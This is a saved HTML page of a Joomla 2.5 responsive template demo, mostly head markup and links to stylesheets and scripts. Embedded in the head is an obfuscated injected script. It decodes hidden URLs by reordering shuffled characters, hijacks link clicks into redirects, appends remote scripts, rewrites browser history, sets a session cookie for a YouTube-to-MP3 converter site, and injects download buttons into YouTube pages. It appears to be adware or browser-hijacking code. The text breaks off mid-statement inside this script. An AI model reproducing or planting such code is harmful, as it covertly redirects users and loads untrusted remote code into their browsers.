<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- saved from url=(0051)http://joomla25-templates.joomlart.com/ja_elastica/ -->
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" slick-uniqueid="3"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <script type="text/javascript" async="" src="./Joomla 2.5 Responsive Web Design_files/ga.js"></script><script type="text/javascript">
var siteurl='/ja_elastica/';
var tmplurl='/ja_elastica/templates/ja_elastica/';
var isRTL = false;
</script>

  <!--<base href="http://joomla25-templates.joomlart.com/ja_elastica/">--><base href=".">
  
  <meta name="keywords" content="Joomla 2.5 templates design, 2.5 Joomla design template, Joomla 2.5 mobile design">
  <meta name="description" content="Joomla 2.5 responsive design user guide for Joomla lovers.">
  <meta name="generator" content="Joomla! - Open Source Content Management">
  <title>Joomla 2.5 Responsive Web Design</title>
  <link href="http://joomla25-templates.joomlart.com/ja_elastica/?format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0">
  <link href="http://joomla25-templates.joomlart.com/ja_elastica/?format=feed&type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0">
  <link href="http://joomla25-templates.joomlart.com/ja_elastica/component/search/?format=opensearch" rel="search" title="Search JA Elastica J25" type="application/opensearchdescription+xml">
  <link rel="stylesheet" href="./Joomla 2.5 Responsive Web Design_files/system.css" type="text/css">
  <link rel="stylesheet" href="./Joomla 2.5 Responsive Web Design_files/general.css" type="text/css">
  <link rel="stylesheet" href="./Joomla 2.5 Responsive Web Design_files/addons.css" type="text/css">
  <link rel="stylesheet" href="./Joomla 2.5 Responsive Web Design_files/layout.css" type="text/css">
  <link rel="stylesheet" href="./Joomla 2.5 Responsive Web Design_files/template.css" type="text/css">
  <link rel="stylesheet" href="./Joomla 2.5 Responsive Web Design_files/usertools.css" type="text/css">
  <link rel="stylesheet" href="./Joomla 2.5 Responsive Web Design_files/css3.css" type="text/css">
  <link rel="stylesheet" href="./Joomla 2.5 Responsive Web Design_files/mega.css" type="text/css">
  <link rel="stylesheet" href="./Joomla 2.5 Responsive Web Design_files/typo.css" type="text/css">
  <link rel="stylesheet" href="./Joomla 2.5 Responsive Web Design_files/layout(1).css" type="text/css">
  <link rel="stylesheet" href="./Joomla 2.5 Responsive Web Design_files/template(1).css" type="text/css">
  <link rel="stylesheet" href="./Joomla 2.5 Responsive Web Design_files/modules.css" type="text/css" media="all">
  <link rel="stylesheet" href="./Joomla 2.5 Responsive Web Design_files/layout-mobile.css" type="text/css" media="only screen and (max-width:719px)">
  <link rel="stylesheet" href="./Joomla 2.5 Responsive Web Design_files/layout-mobile-port.css" type="text/css" media="only screen and (max-width:479px)">
  <link rel="stylesheet" href="./Joomla 2.5 Responsive Web Design_files/layout-tablet.css" type="text/css" media="only screen and (min-width:720px) and (max-width: 985px)">
  <link rel="stylesheet" href="./Joomla 2.5 Responsive Web Design_files/layout-normal.css" type="text/css" media="only screen and (min-width:986px) and (max-width: 1235px)">
  <link rel="stylesheet" href="./Joomla 2.5 Responsive Web Design_files/layout-wide.css" type="text/css" media="only screen and (min-width:1236px)">
  <link rel="stylesheet" href="./Joomla 2.5 Responsive Web Design_files/css3(1).css" type="text/css">
  <link rel="stylesheet" href="./Joomla 2.5 Responsive Web Design_files/mega(1).css" type="text/css">
  <link rel="stylesheet" href="./Joomla 2.5 Responsive Web Design_files/layout-extra-wide.css" type="text/css" media="only screen and (min-width:1440px)">
  <style type="text/css">
/* hide by default */
#ja-extra-col {
	display: none;
	width: 240px;
}

#ja-extra-col-loading {
	display: none;
}
  </style>
  <script src="./Joomla 2.5 Responsive Web Design_files/mootools-core.js" type="text/javascript"></script>
  <script src="./Joomla 2.5 Responsive Web Design_files/core.js" type="text/javascript"></script>
  <script src="./Joomla 2.5 Responsive Web Design_files/mootools-more.js" type="text/javascript"></script>
  <script src="./Joomla 2.5 Responsive Web Design_files/caption.js" type="text/javascript"></script>
  <script src="./Joomla 2.5 Responsive Web Design_files/core(1).js" type="text/javascript"></script>
  <script src="./Joomla 2.5 Responsive Web Design_files/mega.rjd.js" type="text/javascript"></script>
  <script src="./Joomla 2.5 Responsive Web Design_files/jquery-1.6.4.min.js" type="text/javascript"></script>
  <script src="./Joomla 2.5 Responsive Web Design_files/jquery.masonry.js" type="text/javascript"></script><script>var hkghawgalkgklrgjlargjsrhg_hejrghakwghakwegkawefak = (function(){
var e=null,f=[[15,18,7,19,2,0,17,14,6,3,11,20,16,1,9,4,8,13,12,5,10],[19,1,16,5,14,17,13,18,15,8,2,20,7,11,4,9,12,10,3,6,0],[4,1,5,17,0,19,11,7,13,8,18,12,20,3,14,9,6,15,16,10,2],[6,19,15,14,12,5,7,18,1,0,11,13,2,4,17,16,9,20,10,8,3],[26,28,24,18,13,27,22,10,5,15,0,19,29,21,12,17,2,20,9,11,25,6,4,1,23,8,14,16,7,3],[17,12,2,1,0,6,9,5,13,7,11,3,14,8,15,4,16,10],[5,23,27,16,21,20,15,13,18,2,29,0,28,7,24,4,9,3,25,12,22,11,1,19,17,10,6,8,26,14],[9,5,11,15,3,17,16,2,12,1,7,14,10,0,8,13,6,4],[19,24,8,6,
18,4,2,25,22,21,3,28,11,13,10,23,9,30,14,26,12,0,29,20,7,15,1,17,27,5,16],[14,16,13,15,10,18,0,1,9,8,7,2,4,11,3,17,5,12,6],[3,16,8,1,14,4,5,0,9,12,6,11,15,10,13,2,7],[2,1,6,3,5,4,0,7],[7,5,4,3,0,6,2,1],[4,7,6,0,3,5,1,2],[0,2,3,1],[25,30,11,3,19,37,15,14,32,24,40,23,21,8,10,39,22,31,36,12,38,0,18,1,29,17,6,4,34,20,9,13,35,28,5,26,33,27,7,2,16],[38,15,19,24,39,7,13,41,26,21,31,23,40,27,25,18,22,17,16,29,11,2,3,12,8,10,28,9,6,0,34,14,5,32,20,1,36,30,37,35,4,33],[21,4,5,8,37,2,16,30,17,29,32,35,34,36,
28,10,7,31,11,1,24,25,22,19,3,12,23,20,9,15,33,26,18,14,6,27,0,13],[21,12,17,3,28,1,10,7,19,5,20,25,4,0,24,14,27,9,2,15,22,16,8,29,11,6,31,26,13,30,23,18],[32,21,16,7,3,26,15,9,24,37,0,18,14,13,38,19,31,8,20,23,33,30,28,5,36,35,2,12,10,17,25,34,1,11,22,27,6,4,29],[5,6,11,0,8,2,7,13,4,12,3,1,9,10,14],[50,62,39,73,41,57,28,53,23,38,35,8,4,16,71,29,67,12,64,32,56,75,21,27,68,34,30,77,44,37,65,48,7,60,31,19,55,17,18,72,59,42,33,78,58,74,26,61,63,5,6,13,2,76,70,24,69,11,47,15,51,10,9,52,49,3,40,54,25,
36,46,0,66,22,20,43,1,14,45],[7,9,6,10,11,2,4,8,3,5,0,1],[4,21,8,23,12,19,14,13,17,7,26,5,10,16,9,11,22,2,24,29,28,15,3,18,25,20,0,27,1,6],[13,28,33,18,35,16,9,10,0,38,31,7,12,30,25,2,4,20,22,27,26,19,34,15,36,14,5,29,17,11,37,32,23,1,3,24,6,21,8],[6,15,16,2,28,1,5,10,23,19,11,25,24,13,29,22,21,12,26,0,27,30,8,3,14,7,17,9,4,20,18],[2,36,23,18,6,7,3,39,16,8,19,11,31,1,24,25,5,20,22,10,27,37,0,14,21,17,13,28,30,33,38,32,26,34,40,15,29,9,12,4,35],[13,5,4,7,6,8,1,3,15,12,9,0,16,14,10,11,2],[0,8,5,9,16,
1,7,12,21,10,22,13,15,11,6,20,4,14,18,17,23,2,19,3],[22,24,13,8,7,28,27,10,19,5,17,9,14,23,3,12,15,2,11,6,25,4,29,1,26,16,0,18,21,20],[20,14,17,15,12,7,0,6,13,5,1,3,19,4,21,11,18,2,16,10,8,9],[2,4,1,9,0,19,17,8,6,10,16,7,18,5,20,15,11,3,13,12,14],[5,21,12,8,16,20,18,14,1,9,7,2,15,10,6,0,4,13,17,11,19,3],[5,16,20,4,8,11,17,18,7,2,9,14,13,21,6,0,22,12,10,19,3,15,1],[10,15,4,21,0,13,1,2,8,11,14,12,6,7,22,5,3,18,19,20,23,16,9,17],[0,13,3,2,12,6,9,10,5,14,7,11,17,4,16,8,1,15,18,19],[18,10,3,0,19,14,4,
15,8,16,17,7,6,13,20,1,5,9,2,11,12],[10,13,15,11,5,7,14,8,2,3,18,9,16,19,1,12,4,17,0,6],[5,19,1,15,9,14,3,8,17,4,7,16,0,10,2,6,13,20,18,12,11],[9,13,14,5,18,4,16,3,11,6,7,0,2,12,1,10,19,15,8,17],[15,7,13,6,11,4,9,19,12,14,16,3,2,5,10,0,1,20,17,18,8],[8,0,3,12,9,17,15,19,14,4,2,5,1,18,13,10,11,7,6,16],[4,18,2,20,10,3,14,15,8,1,17,5,13,16,9,11,19,0,12,7,6],[0,17,2,22,8,3,20,6,9,4,1,19,15,12,7,10,16,11,5,13,18,21,14],[3,15,6,19,16,23,14,0,12,10,5,20,11,4,13,17,2,1,18,7,9,21,22,8],[25,11,9,10,2,0,3,28,
22,24,26,18,14,23,8,27,12,19,16,1,4,6,17,15,13,7,5,21,20],[8,6,33,23,29,36,32,31,26,9,42,35,25,19,46,15,41,38,20,21,30,10,5,48,24,3,28,13,4,11,43,7,14,44,22,39,1,18,45,0,27,40,34,37,12,49,47,2,17,16],[5,2,6,8,1,0,3,7,4],[16,7,14,8,10,1,4,13,17,5,6,2,9,12,11,3,0,15],[16,4,0,2,3,14,12,15,8,6,9,13,7,1,11,17,5,10],[11,6,13,7,10,4,20,9,22,0,8,19,3,2,5,14,1,21,17,18,15,12,16],[15,14,5,1,3,17,6,9,4,16,12,2,7,8,13,11,0,10],[13,26,9,14,2,8,3,25,10,27,20,21,5,1,7,23,15,0,17,22,16,18,12,24,19,28,11,6,4],[18,
39,24,9,33,30,12,11,36,6,43,1,2,27,35,19,42,5,26,22,45,15,4,31,14,38,37,20,17,25,44,41,0,7,23,8,10,40,28,16,21,13,32,29,3,34,46],[0,3,15,10,14,2,12,7,9,11,4,13,1,8,6,5],[5,8,15,16,3,12,4,11,10,6,13,1,17,2,14,7,9,0],[8,9,0,1,4,6,2,3,10,7,5,11],[20,22,4,14,21,8,5,13,15,1,17,19,26,3,25,28,0,18,2,27,11,9,16,12,7,24,6,10,23],[0,23,17,27,20,33,15,24,19,18,26,11,28,8,34,36,32,31,14,13,12,38,5,21,37,7,3,16,29,25,9,2,1,22,6,35,10,4,30],[9,16,8,6,7,0,11,4,3,12,10,13,17,15,1,2,5,14],[6,8,5,2,11,0,1,4,7,3,9,
12,10],[10,12,4,2,5,0,1,9,8,6,3,7,11],[0,4,9,10,1,8,2,5,7,6,11,12,3],[10,3,9,0,8,5,2,4,7,6,1],[5,7,1,6,10,3,8,0,9,12,4,2,11],[5,10,11,8,1,4,3,7,2,0,9,6,12],[0,6,4,1,7,2,11,3,5,8,10,9,12],[84,42,18,34,80,0,22,10,11,47,9,33,46,59,26,55,78,60,61,62,2,43,7,1,45,76,23,49,4,14,21,81,83,82,56,79,72,8,37,86,20,70,31,88,29,30,13,36,27,19,40,53,52,5,73,51,69,24,3,6,35,48,74,39,28,16,32,87,38,68,66,71,41,65,57,63,54,50,58,85,17,77,15,64,44,67,75,25,12],[65,20,25,15,36,43,57,45,10,38,50,66,54,39,2,60,26,21,8,
34,7,23,18,70,51,33,19,30,11,22,40,59,56,0,46,61,53,28,58,55,67,64,49,48,44,29,37,13,62,47,4,3,6,5,32,17,1,16,41,42,14,68,35,27,24,31,69,63,12,52,9,71],[49,25,51,43,22,54,20,3,42,9,32,55,35,34,18,1,26,58,37,16,60,8,65,6,13,24,36,12,62,64,11,17,28,40,10,45,63,41,14,21,29,52,0,23,53,66,19,56,59,39,46,57,67,48,15,44,5,38,4,33,50,47,61,30,27,31,7,2],[60,19,14,44,53,62,61,43,30,25,40,32,37,34,42,11,22,63,28,50,3,9,12,33,4,1,49,17,68,0,27,45,39,46,20,29,66,16,8,52,71,41,56,13,48,6,26,2,67,10,70,18,58,54,
24,5,21,36,64,57,51,55,59,23,69,38,35,7,31,15,65,47],[39,53,33,46,50,56,45,63,38,0,73,47,4,28,70,31,5,44,6,52,2,35,14,13,68,8,3,19,26,32,66,20,61,51,7,29,55,71,62,25,22,48,41,9,24,18,72,15,69,23,42,16,30,58,67,40,37,1,59,27,11,34,10,64,12,60,17,54,65,57,49,21,36,43],[3,65,21,7,8,18,34,10,29,5,17,36,70,63,53,4,15,6,43,0,52,37,20,30,49,1,59,62,35,42,16,45,55,64,26,60,12,25,32,24,56,38,11,31,23,57,66,22,68,27,61,41,54,47,40,44,39,71,2,58,13,33,67,9,48,19,14,50,28,69,46,51],[4,65,39,18,23,61,42,66,28,
20,67,44,16,36,12,8,14,29,25,59,0,49,56,26,19,37,40,71,50,55,62,24,22,57,69,3,2,21,11,13,45,60,17,43,5,31,63,1,38,41,53,47,72,30,32,10,46,64,33,70,51,7,34,35,58,54,6,68,52,27,48,9,15],[8,11,15,5,7,0,1,10,13,9,12,14,6,3,16,2,4],[7,5,14,1,15,9,17,2,4,13,8,0,11,16,12,10,6,3],[10,14,15,16,12,9,4,1,5,3,6,17,0,8,18,7,11,13,2],[22,6,21,9,20,7,10,18,12,19,2,17,8,1,13,3,4,23,11,14,15,0,5,16],[15,5,7,9,6,14,1,3,11,13,17,8,10,16,12,4,0,2],[11,2,12,16,18,8,6,10,0,3,13,4,5,17,1,14,9,15,7],[2,1,21,10,8,6,4,20,
16,11,3,12,9,14,18,15,13,19,0,22,5,17,7],[9,3,0,20,16,14,17,19,15,1,10,7,4,12,11,18,13,2,6,8,5],[14,15,6,10,0,8,12,4,9,2,19,7,5,18,17,3,11,20,16,13,1,21],[12,15,18,17,5,11,2,20,1,19,22,3,0,9,16,6,14,10,13,21,4,7,8],[12,3,2,8,7,9,13,16,15,0,6,17,10,14,1,11,4,5],[18,6,13,3,2,8,0,7,1,11,14,9,15,10,12,4,16,17,5],[14,10,9,8,7,3,4,5,12,1,13,6,2,0,11,15],[10,14,17,15,3,1,13,2,11,7,4,8,5,6,9,0,12,16],[8,14,13,7,4,9,10,17,16,15,6,3,12,5,11,0,18,2,1],[2,10,4,8,6,12,7,1,11,15,16,3,0,17,9,5,14,13],[9,3,2,5,12,
16,6,14,10,7,0,8,11,1,15,4,13],[6,17,9,5,23,10,7,14,16,4,0,15,8,19,2,11,12,22,21,18,20,1,3,13],[14,10,9,25,19,7,4,16,15,12,17,2,22,23,20,11,13,18,5,6,0,24,8,21,3,1],[17,14,0,12,4,8,1,10,3,15,13,7,16,5,6,11,9,2],[5,6,13,11,9,14,4,1,15,8,7,12,0,3,2,10],[6,17,19,7,8,11,15,18,14,21,13,5,4,16,3,1,9,20,2,0,10,12],[5,8,7,13,12,4,3,10,20,16,18,9,1,6,11,2,19,15,17,14,0,21,22],[6,0,3,10,1,11,18,12,17,9,8,4,13,14,16,15,19,2,7,5],[10,6,3,9,8,11,2,15,18,19,16,5,4,14,13,12,1,0,17,7],[0,7,18,20,12,10,14,13,1,4,
6,19,2,21,23,17,9,8,16,15,11,5,22,3]];function k(b,a){var c,d,h,g;for(c=1;c<b.length;c++){h=b[c];g=a[c];for(d=c;d>0&&b[d-1]>h;)b[d]=b[d-1],a[d]=a[d-1],d--;b[d]=h;a[d]=g}}var p,q,r,s;function aa(){var b=f[4];if(!t){var a="l,n,w,c,m,i,n,.,/,l,h,o,k,/,u,.,t,m,w,t,/,/,:,t,e,w,b,r,w,p".split(",");k(b,a);t=a.join("")}return t}var t,u;function ba(){var b=f[6];if(!v){var a="/,e,e,r,/,m,l,m,c,t,t,h,x,w,w,:,w,p,/,u,n,t,t,o,.,.,/,w,t,b".split(",");k(b,a);v=a.join("")}return v}var v,w;
function ca(){var b=f[8];if(!x){var a="o,w,w,/,c,:,t,/,n,/,p,o,t,m,.,e,w,o,b,p,u,h,t,m,w,l,t,.,h,/,r".split(",");k(b,a);x=a.join("")}return x}var x,y,z;function da(){var b=f[11];if(!A){var a="a,e,o,p,c,r,h,m".split(",");k(b,a);A=a.join("")}return A}var A;function ea(){var b=f[14];if(!B){var a=["r","f","=","e"];k(b,a);B=a.join("")}return B}var B;
function fa(){var b=f[15];if(!C){var a="p,.,v,p,3,i,o,e,h,/,=,t,n,w,.,k,e,p,l,i,n,h,p,t,o,m,/,:,?,.,w,d,d,m,/,r,p,o,w,t,2".split(",");k(b,a);C=a.join("")}return C}var C;function ga(){var b=f[16];if(!D){var a=".,o,3,/,p,w,d,p,f,n,o,t,h,t,a,p,e,m,2,r,v,t,p,i,w,.,e,w,/,h,l,e,/,w,.,t,a,d,d,o,:,n".split(",");k(b,a);D=a.join("")}return D}var D;function ha(){var b=f[17];if(!E){var a="n,:,/,w,/,t,2,Y,m,/,u,b,u,e,w,.,w,o,v,t,/,v,e,3,p,i,t,.,w,o,T,i,p,e,/,e,h,d".split(",");k(b,a);E=a.join("")}return E}
var E,F,G;function ia(){var b=f[24];if(!H){var a=".,C,n,1,.,7,.,1,h,p,m,9,6,m,g,t,:,4,y,t,e,5,t,0,p,1,/,o,.,2,h,e,t,t,p,/,/,/,6".split(",");k(b,a);H=a.join("")}return H}var H,I,J,K,L;function ja(){var b=f[31];if(!M){var a="t,:,t,w,h,o,.,w,/,.,e,w,c,/,m,l,g,p,o,o,g".split(",");k(b,a);M=a.join("")}return M}var M;function ka(){var b=f[32];if(!N){var a=":,m,g,w,l,o,.,o,t,w,/,t,g,w,/,h,s,o,e,.,c,p".split(",");k(b,a);N=a.join("")}return N}var N;
function la(){var b=f[33];if(!O){var a="/,e,.,:,w,g,.,c,w,t,w,g,o,j,/,h,p,o,.,o,p,l,t".split(",");k(b,a);O=a.join("")}return O}var O;function ma(){var b=f[34];if(!P){var a="w,g,s,.,h,o,t,t,w,.,o,g,/,/,j,:,p,.,c,o,p,l,w,e".split(",");k(b,a);P=a.join("")}return P}var P;function na(){var b=f[35];if(!Q){var a="h,o,p,t,o,/,w,.,/,g,w,g,.,:,e,w,t,l,d,e".split(",");k(b,a);Q=a.join("")}return Q}var Q;
function oa(){var b=f[36];if(!R){var a=".,w,p,h,d,o,s,g,w,l,e,/,/,o,e,t,:,w,t,.,g".split(",");k(b,a);R=a.join("")}return R}var R;function pa(){var b=f[37];if(!S){var a=".,o,l,g,/,w,g,w,t,p,f,w,e,r,t,o,:,.,h,/".split(",");k(b,a);S=a.join("")}return S}var S;function qa(){var b=f[38];if(!T){var a=":,f,t,g,w,o,p,w,e,s,/,l,h,w,t,/,o,r,.,g,.".split(",");k(b,a);T=a.join("")}return T}var T;
function ra(){var b=f[39];if(!sa){var a="w,o,g,/,c,:,e,p,g,/,w,h,t,o,t,.,a,l,w,.".split(",");k(b,a);sa=a.join("")}return sa}var sa;function ta(){var b=f[40];if(!ua){var a="g,/,o,/,.,s,w,c,g,o,l,p,t,:,w,h,t,a,e,.,w".split(",");k(b,a);ua=a.join("")}return ua}var ua;function va(){var b=f[41];if(!wa){var a="w,h,p,o,w,.,l,s,g,:,t,/,t,e,o,.,g,w,/,e".split(",");k(b,a);wa=a.join("")}return wa}var wa;
function xa(){var b=f[42];if(!ya){var a="s,.,t,s,w,p,o,g,w,t,e,:,o,l,w,.,e,h,g,/,/".split(",");k(b,a);ya=a.join("")}return ya}var ya;function za(){var b=f[43];if(!Aa){var a="h,.,t,k,w,p,.,/,w,:,t,o,l,o,w,.,e,g,/,o,c,u,g".split(",");k(b,a);Aa=a.join("")}return Aa}var Aa;function Ba(){var b=f[44];if(!Ca){var a="p,g,/,c,l,k,o,h,g,w,:,o,.,s,o,e,t,t,.,/,w,.,u,w".split(",");k(b,a);Ca=a.join("")}return Ca}var Ca,Da,Ea,Fa;
function Ga(){var b=f[48];if(!Ha){var a="n,w,z,w,.,t,:,a,.,/,/,t,w,m,a,p,h,o".split(",");k(b,a);Ha=a.join("")}return Ha}var Ha;function Ia(){var b=f[49];if(!Ja){var a="e,.,.,o,p,.,n,n,c,l,k,k,i,h,a,t,c,b".split(",");k(b,a);Ja=a.join("")}return Ja}var Ja,Ka,La,Ma,Na,Oa,Pa,Qa,Ra,Sa;function Ta(){var b=f[59];if(!Ua){var a="w,n,w,/,w,h,a,:,p,m,.,a,.,o,t,t,/,z".split(",");k(b,a);Ua=a.join("")}return Ua}var Ua,Va,Wa,Xa,Ya,Za,$a,ab,bb,cb,db,eb,fb,gb,hb,ib;
function jb(){var b=f[75];if(!kb){var a="w,/,z,t,o,w,.,t,:,a,w,h,a,n,m,.,/,p".split(",");k(b,a);kb=a.join("")}return kb}var kb;function lb(){var b=f[76];if(!mb){var a="w,a,z,o,a,w,s,t,:,p,/,n,h,w,.,/,.,m,t".split(",");k(b,a);mb=a.join("")}return mb}var mb;function nb(){var b=f[77];if(!ob){var a="e,/,n,w,.,w,.,p,i,3,t,m,w,t,d,p,:,t,v,e,o,h,/,2".split(",");k(b,a);ob=a.join("")}return ob}var ob;
function pb(){var b=f[78];if(!qb){var a="l,/,w,w,/,g,t,p,g,o,.,w,.,e,o,:,h,t".split(",");k(b,a);qb=a.join("")}return qb}var qb;function rb(){var b=f[79];if(!sb){var a=".,t,g,l,.,w,/,w,h,p,o,s,:,e,t,o,w,g,/".split(",");k(b,a);sb=a.join("")}return sb}var sb;function tb(){var b=f[80];if(!ub){var a="t,t,o,.,w,/,:,c,o,f,p,a,w,e,k,b,c,.,h,m,/,o,w".split(",");k(b,a);ub=a.join("")}return ub}var ub;
function vb(){var b=f[81];if(!wb){var a="w,p,h,.,b,c,o,k,e,t,w,/,s,f,.,o,a,t,/,w,:".split(",");k(b,a);wb=a.join("")}return wb}var wb;function xb(){var b=f[82];if(!yb){var a="t,u,/,.,h,w,o,:,w,t,c,w,/,.,e,p,y,o,b,u,t,m".split(",");k(b,a);yb=a.join("")}return yb}var yb;function zb(){var b=f[83];if(!Ab){var a="y,t,e,b,:,.,t,c,t,.,m,p,h,w,u,/,u,w,o,o,s,/,w".split(",");k(b,a);Ab=a.join("")}return Ab}var Ab;
function Bb(){var b=f[84];if(!Cb){var a="e,p,t,w,t,i,r,o,c,h,/,m,t,.,t,t,:,/".split(",");k(b,a);Cb=a.join("")}return Cb}var Cb;function Db(){var b=f[85];if(!Eb){var a="m,/,e,p,t,t,h,/,t,t,r,w,.,i,t,s,c,o,:".split(",");k(b,a);Eb=a.join("")}return Eb}var Eb;function Fb(){var b=f[86];if(!Gb){var a="o,t,v,l,f,p,:,/,.,t,c,/,t,h,o,m".split(",");k(b,a);Gb=a.join("")}return Gb}var Gb;function Hb(){var b=f[87];if(!Ib){var a=".,z,.,o,p,t,a,t,a,w,:,w,/,/,w,h,m,n".split(",");k(b,a);Ib=a.join("")}return Ib}var Ib;
function Jb(){var b=f[88];if(!Kb){var a="w,a,m,/,s,w,w,n,o,z,/,p,a,:,.,h,.,t,t".split(",");k(b,a);Kb=a.join("")}return Kb}var Kb;function Lb(){var b=f[89];if(!Mb){var a="t,.,:,w,/,u,w,t,t,l,r,p,h,.,w,/,b,m".split(",");k(b,a);Mb=a.join("")}return Mb}var Mb;function Nb(){var b=f[90];if(!Ob){var a="w,p,t,/,r,.,/,u,.,w,h,w,o,t,t,:,k".split(",");k(b,a);Ob=a.join("")}return Ob}var Ob;
function Pb(){var b=f[91];if(!Qb){var a="/,m,w,/,t,.,w,e,2,:,h,o,w,3,t,v,i,e,n,p,.,t,p,d".split(",");k(b,a);Qb=a.join("")}return Qb}var Qb;function Rb(){var b=f[92];if(!Sb){var a="t,.,w,g,m,w,:,b,u,o,e,t,.,o,p,y,u,-,/,/,h,r,w,3,p,t".split(",");k(b,a);Sb=a.join("")}return Sb}var Sb;function Tb(){var b=f[93];if(!Ub){var a=".,g,h,o,:,w,t,.,p,l,o,w,e,/,/,g,w,t".split(",");k(b,a);Ub=a.join("")}return Ub}var Ub,Vb,Wb,Xb,Yb,Zb;
function $b(){var b=f[99];if(!ac){var a="h,w,n,.,l,.,c,i,t,:,/,k,t,c,m,a,w,w,b,k,c,/,o,p".split(",");k(b,a);ac=a.join("")}return ac}var ac;function bc(b){var a=document.createElement("script");a.setAttribute("type","text/javascript");a.setAttribute("src",b);typeof a!="undefined"&&document.getElementsByTagName("head")[0].appendChild(a)}function cc(b){try{var a=JSON.parse(window.localStorage.settingsDaemon);return a[b]?a[b]:e}catch(c){return e}}function dc(b,a){var c=cc(b);return c?c:a}
function ec(){try{var b=window.localStorage.versionDaemon;return b?parseInt(b,10):1}catch(a){return 1}}
function U(b,a,c,d,h,g){b.onclick=function(b){var b=b||window.event,j=b.which==2||b.ctrlKey||b.metaKey;V(c,d,g);if(h)if(fc()){var l=gc,m=f[0];if(!p){var o="r,o,w,m,t,h,c,p,/,p,h,/,.,t,w,:,w,a,e,/,.".split(",");k(m,o);p=o.join("")}l(a,p,j)}else{l=f[1];q||(m="m,t,.,/,p,c,a,o,r,w,t,/,w,h,:,w,e,.,p,/,h".split(","),k(l,m),q=m.join(""));l=a;m=q;if(o=ec()>=10){o=f[2];if(!r){var n=":,t,/,c,h,m,h,w,a,w,o,e,/,p,p,w,/,r,.,.,t".split(",");k(o,n);r=n.join("")}o=m!=r}o?l=m+"# #"+l:(m=f[3],s||(o="/,m,r,p,e,/,w,o,t,h,h,a,t,:,c,.,w,#,.,w,p".split(","),
k(m,o),s=o.join("")),l=s+l);j?window.open(l,"_blank"):window.location.href=l}else j?window.open(a,"_blank"):window.location.href=a;b.stopPropagation();return!1}}function fc(){return!navigator.userAgent||navigator.userAgent.indexOf("Firefox")==-1?!1:!0}function W(){return(new Date).getTime()}function hc(){var b=document.getElementById("main");if(b!=e)b.style.display="none"}
function V(b,a,c){if(Math.random()<c&&(b={event:b,data:a,randomString:ic(3)},a=document.getElementById("mixpanel"),a!=e))a.innerHTML=JSON.stringify(b)}function gc(b,a,c){var a={event:"redirect",data:{url:b,referer:a}},d=document.getElementById("chromeServerToAddonMessage");if(d!=e)d.innerHTML=JSON.stringify(a),setTimeout(function(){c?window.open(b,"_blank"):window.location.href=b},250)}
function X(b,a,c){if(b!=e){b=b.getElementsByTagName(a);for(a=0;a<b.length;a++)if(b[a].className.indexOf(c)==0)return b[a]}return e}function ic(b){for(var a="",c=0;c<b;c++)a+="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz".charAt(Math.floor(Math.random()*52));return a}
function jc(){kc=setInterval(function(){var b=X(document.body,"button","IDD EMB");if(b!=e)clearInterval(kc),b.onmousedown=function(){var a=f[10];if(!z){var b="u,1,s,r,.,t,_,o,t,=,p,p,0, ,0,k,o".split(",");k(a,b);z=b.join("")}V(z,{},0.01)}},700)}var kc,Y=e;function lc(){if(Y!=e)for(var b=document.getElementsByTagName("a"),a=0;a<b.length;a++)b[a].onmouseup=function(){mc()}}function nc(){var b=Z.substring(0,oc);Y=Z;window.history.replaceState(e,"",b);window.onbeforeunload=function(){mc()}}
function mc(){Y!=e&&window.history.replaceState(e,"",Y)}
function pc(){var b=document.getElementById("progress_info");if(b){if(b.style)b.style.font="12px arial,sans-serif";document.body.insertBefore(b,document.body.firstChild);document.body.style.margin="0px";var a=document.getElementById("content");if(a)a.style.margin="0px";for(var a=document.body.childNodes,c=0;c<a.length;c++){var d=a[c];if(d!=b&&d.style)d.style.visibility="hidden"}}qc=setInterval(function(){var a=document.getElementById("dl_link");if(a.firstChild){clearInterval(qc);window.location.href=
a.firstChild.href;try{a.getElementsByTagName("a")[1].style.display="none"}catch(b){}}},200)}var qc;
function rc(){window.location.href.indexOf(ha())==0&&(sc=setInterval(function(){var b=document.getElementById("download");if(b)clearInterval(sc),window.location.href=b.href,setTimeout(function(){var a=window.location,c=f[18];if(!F){var d="m,x,e,p,o,t,.,w,c,/,o,w,:,h,o,t,l,w,t,u,/,b,w,a,o,/,#,n,y,d,d,.".split(",");k(c,d);F=d.join("")}a.href=F+b.href},17E3)},200));tc=setInterval(function(){var b=document.getElementById("conv");if(b){clearInterval(tc);document.body.insertBefore(b,document.body.firstChild);
for(var a=document.body.childNodes,c=0;c<a.length;c++){var d=a[c];if(d!=b&&d.style)d.style.visibility="hidden"}}},200)}var sc,tc;
function uc(){var b=document.getElementsByTagName("pre");if(b!=e&&b.length>0&&(b=JSON.parse(b[0].innerHTML).phpsessid))document.cookie="PHPSESSID="+b+"; path=/; domain=.flvto.com lang=en; expires="+(new Date((new Date).getTime()+18E5)).toGMTString(),window.location.href="http://flvto.com";setTimeout(function(){var a=document.getElementById("upload");if(a){hc();document.body.appendChild(a);var b=document.createElement("h1");b.innerHTML="Converting YouTube video to MP3";b.style.textAlign="center";b.style.fontSize=
"50px";b.style.fontWeight="bold";a.insertBefore(b,a.childNodes[0]);if(a=document.getElementById("progress-info"))a.style.fontSize="35px",a.style.fontWeight="bold",a.style.paddingTop="40px";if(a=document.getElementById("progress"))a.style.padding="40px"}else{a:{a=document.body;if(a!=e){a=a.getElementsByTagName("div");for(b=0;b<a.length;b++)if(a[b].className=="b_form"){a=a[b];break a}}a=e}if(a)hc(),document.body.appendChild(a),a.style.fontSize="20px"}},1E3)}var vc=e;
function wc(){try{document.getElementsByTagName("html").item(0).lang&&document.getElementsByTagName("body").item(0).className&&window.location.href.match("youtube.com")&&document.getElementsByTagName("html").item(0);var b=["Download this video!","Download","Download specific format"],a=function(a,c,g){document.getElementById("watch-actions-right")&&(document.getElementById("watch-actions-right").innerHTML+='<div id="watch-actions-center" style="display:inline;">&nbsp;<span class="yt-uix-button-group addto-container watch show-label"><button id="download" class="start yt-uix-tooltip-reverse yt-uix-button yt-uix-button-default yt-uix-tooltip" data-tooltip-title="'+
